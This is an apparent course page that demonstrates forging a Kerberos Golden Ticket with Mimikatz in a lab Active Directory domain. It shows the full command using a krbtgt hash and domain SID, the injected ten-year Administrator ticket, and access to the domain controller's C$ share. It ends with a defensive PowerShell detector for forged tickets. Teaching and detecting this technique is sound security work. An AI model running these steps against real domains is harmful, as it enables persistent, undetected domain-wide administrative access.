# Traditional Golden Ticket using Mimikatz

It is important to first read about [Forests and trust relationships](/cpad/persistencia-y-post-explotacion-en-ad/bosques-y-relaciones-de-confianza.md).

We start from a session with no cached tickets. Running the following commands produces this output:

```powershell
PS C:\Users\regular.user> klist

Current LogonId is 0:0x24f19b8

Cached Tickets: (0)

PS C:\Users\regular.user> dir \\First-DC.spartancybersec.corp\c$
dir : Access is denied
At line:1 char:1
+ dir \\First-DC.spartancybersec.corp\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\First-DC.spartancybersec.corp\c$:String) [
   Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands
   .GetChildItemCommand

dir : Cannot find path '\\First-DC.spartancybersec.corp\c$' because it does not exist.
At line:1 char:1
+ dir \\First-DC.spartancybersec.corp\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (\\First-DC.spartancybersec.corp\c$:String) [Ge
   t-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
```

The command we will use is:

{% code overflow="wrap" %}

```powershell
PS C:\Users\admin\Desktop\SHARED> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /krbtgt:b44daa015f201fa31126895ebbcbbcab /ticket:evil.tck /ptt
User      : Administrator
Domain    : spartancybersec.corp (SPARTANCYBERSEC)
SID       : S-1-5-21-1861162130-2580302541-221646211
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: b44daa015f201fa31126895ebbcbbcab - rc4_hmac_nt
Lifetime  : 11/22/2023 11:41:28 PM ; 11/19/2033 11:41:28 PM ; 11/19/2033 11:41:28 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ spartancybersec.corp' successfully submitted for current session

mimikatz # exit
Bye!
```

{% endcode %}

Afterwards we can check our cached tickets:

```powershell
PS C:\Users\admin\Desktop\SHARED> klist

Current LogonId is 0:0x24f1977

Cached Tickets: (1)

#0>     Client: Administrator @ spartancybersec.corp
        Server: krbtgt/spartancybersec.corp @ spartancybersec.corp
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 11/22/2023 23:41:28 (local)
        End Time:   11/19/2033 23:41:28 (local)
        Renew Time: 11/19/2033 23:41:28 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
```

To confirm that the ticket works, we can use the following command:

```powershell
PS C:\Users\admin\Desktop\SHARED> dir \\First-DC.spartancybersec.corp\c$

    Directory: \\First-DC.spartancybersec.corp\c$

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/14/2018   6:56 AM                EFI
d-----       11/18/2023   4:22 PM                NTDS
d-----        5/13/2020   5:58 PM                PerfLogs
d-r---        9/19/2022  11:23 PM                Program Files
d-----        9/19/2022  11:47 PM                Program Files (x86)
d-r---        9/19/2022  11:40 PM                Users
d-----       11/21/2023   1:27 AM                Windows
```
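
The `klist` output on this page shows three properties a defender can check on a host: a ticket lifetime of about ten years, RC4-HMAC ticket encryption, and an empty `Kdc Called` field. The following PowerShell is an added example, not part of the original page or of any tool it describes; the function name `Find-SuspiciousTgt`, the 10-hour threshold (the default domain policy for user ticket lifetime), the second sample ticket and the US date format are assumptions.

```powershell
# Added example: flag cached TGTs that look forged. Names and thresholds are assumptions.
function Find-SuspiciousTgt {
    param([string[]]$KlistLines, [double]$MaxHours = 10)
    $culture = [Globalization.CultureInfo]::InvariantCulture
    $fmt = 'M/d/yyyy H:mm:ss'          # assumed klist date format (matches this page)
    $tickets = @(); $current = $null
    foreach ($line in $KlistLines) {
        if ($line -match '^#\d+>\s+Client:\s+(.+)$') {
            # A new ticket entry starts; collect its fields in a hashtable
            $current = @{ Client = $Matches[1].Trim() }; $tickets += $current
        } elseif ($current -and $line -match '^\s+([A-Za-z ]+?):\s*(.*)$') {
            $current[$Matches[1]] = $Matches[2].Trim()
        }
    }
    foreach ($t in $tickets) {
        if ($t['Server'] -notmatch '^krbtgt/') { continue }   # only inspect TGTs
        $start = [datetime]::ParseExact(($t['Start Time'] -replace '\s*\(local\)$'), $fmt, $culture)
        $end   = [datetime]::ParseExact(($t['End Time'] -replace '\s*\(local\)$'), $fmt, $culture)
        $hours = ($end - $start).TotalHours
        $reasons = @()
        if ($hours -gt $MaxHours) { $reasons += "lifetime $([math]::Round($hours)) h exceeds $MaxHours h" }
        if ($t['KerbTicket Encryption Type'] -match 'RC4') { $reasons += 'RC4-HMAC ticket encryption' }
        if (-not $t['Kdc Called']) { $reasons += 'no KDC recorded for this ticket' }
        if ($reasons) {
            [pscustomobject]@{ Client = $t['Client']; Server = $t['Server']; Reasons = $reasons -join '; ' }
        }
    }
}

# Sample input: ticket #0 is trimmed from the klist output on this page;
# ticket #1 is constructed here to show what an ordinary TGT looks like.
$sample = @'
#0>     Client: Administrator @ spartancybersec.corp
        Server: krbtgt/spartancybersec.corp @ spartancybersec.corp
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 11/22/2023 23:41:28 (local)
        End Time:   11/19/2033 23:41:28 (local)
        Kdc Called:
#1>     Client: regular.user @ spartancybersec.corp
        Server: krbtgt/spartancybersec.corp @ spartancybersec.corp
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 11/22/2023 13:00:00 (local)
        End Time:   11/22/2023 23:00:00 (local)
        Kdc Called: First-DC.spartancybersec.corp
'@ -split "`r?`n"

Find-SuspiciousTgt -KlistLines $sample | Format-List
```

On a live host, pass `(klist)` instead of `$sample`. The three checks are heuristics: legitimate RC4 tickets still appear in domains that have not disabled RC4, so treat a hit as a lead to investigate rather than proof.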


